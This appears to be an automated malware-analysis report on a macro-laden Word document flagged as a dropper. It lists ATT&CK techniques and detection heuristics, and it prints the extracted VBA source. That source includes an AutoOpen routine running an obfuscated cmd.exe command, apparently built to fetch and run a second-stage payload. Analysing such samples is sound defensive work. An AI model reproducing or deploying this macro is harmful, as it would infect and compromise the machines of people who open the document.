MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample contains VBA macros that are triggered by the autoopen event. These macros execute cmd.exe with a complex command that appears to download and execute a second-stage payload. The ClamAV detection name 'Doc.Dropper.Agent-6853967-0' further supports this dropper functionality.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6853967-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6853967-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBA
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2086 bytes |
SHA-256: e87aca663d138119b1d9e25c188691afbed10cc7734de08bed251ca8f5328546 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
' UJQBV840GIQAH8W2ECKTCNIZRO2VXA763EVWT0SZE38G6
Public Function SZOJ7DDVGZESUF38H99QRAQFG9BZVIY74ZPKFK6L70E6OCM3HVH(TSZ8XD0Q4V, TSZ8XD0Q4V2)
' H8P0GTJTAYRIWWG98VHUR80899AKUMJULVOMIC4EA0GG1SXW7MRI78P5P
TSZ8XD0Q4V3 = TSZ8XD0Q4V & TSZ8XD0Q4V2
End Function
Public Sub NOLIPZMGRIORZT3OCTG8JNG4V64MHJIFRPXXTH9KFQYHK8Q1VSV1ZCIPM0Y9381()
Shell "system\Faith\..\..\Destiny\..\Halo\..\CmD.EXe /v:ON /c" & Chr(34) & "set initi= && set x=jMr%/SyhCn-)Dt'Bse2ENP:,Hp\KwkuaF6l;Ti.(c dboxWm && for %H in (25,44,28,17,2,16,7,17,34,34,41,10,28,41,24,37,42,42,17,9,41,10,19,45,17,40,30,13,37,44,9,21,44,34,37,40,6,41,15,6,25,31,16,16,41,39,9,17,28,10,44,43,0,17,40,13,41,5,6,16,13,17,47,38,20,17,13,38,46,17,43,8,34,37,17,9,13,11,38,12,44,28,9,34,44,31,42,32,37,34,17,39,14,7,13,13,25,16,22,4,4,40,31,16,31,9,31,10,31,17,38,40,44,47,4,7,44,29,38,17,45,17,14,23,14,3,36,19,1,21,3,26,7,44,29,38,17,45,17,14,11,35,41,3,36,19,1,21,3,26,7,44,29,38,17,45,17,1404) DO (set initi=!initi!!x:~%H,1!) && if %H == 1404 call !initi:~-157!" & Chr(34) & "", 0 ' ZHLI0GT7N8MZLF8NALX5L80XT
' BI3I8YT0E4KAVER9A37HAM4BJWD52CFE1UZXF7NJ1WX0W9Q3WMCY6BKCXB9RS
End Sub
Public Sub autoopen()
' AJF22U0WDV3EUQOPV9HYCN4R2RY
Call NOLIPZMGRIORZT3OCTG8JNG4V64MHJIFRPXXTH9KFQYHK8Q1VSV1ZCIPM0Y9381
' RLSP94NTIFVW4NK6BTIDR9CJGMO
' Q78U0OOEB4HW3FHNAEL3RH2JHBI9VPIX3KJRCLRTBXZM2G CFQBUIMNS2VTI6ODODN7LJ8MNGRIV1N7J12B7QTOBCYKWNP
End Sub
' SC366DAYJK0C5RGLX2EDQZS30UUP1A9KP1FINZ7JTRZCWB457NAIUXJQWCSZZD
' BP47YOU2AD62N8838
Public Sub Document_Close()
' D1R82WIFPHAB2BOT8FLB58G096N18CRBH4TT ' T01NI2QP0JT6Y4QETDHJLXS12VSSMVJSF6Q173PYYFT1NKDXZ
' V4ZDLNU2DUII9P3540RG66QQ1TFHHTI3K7BSUO312CJ
End Sub
Public Sub Document_New()
' YC23ZQCMCNDDLML3GXP58GNFM2A5GHULBRYO36D90TRF8XNCO68KUHT4
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.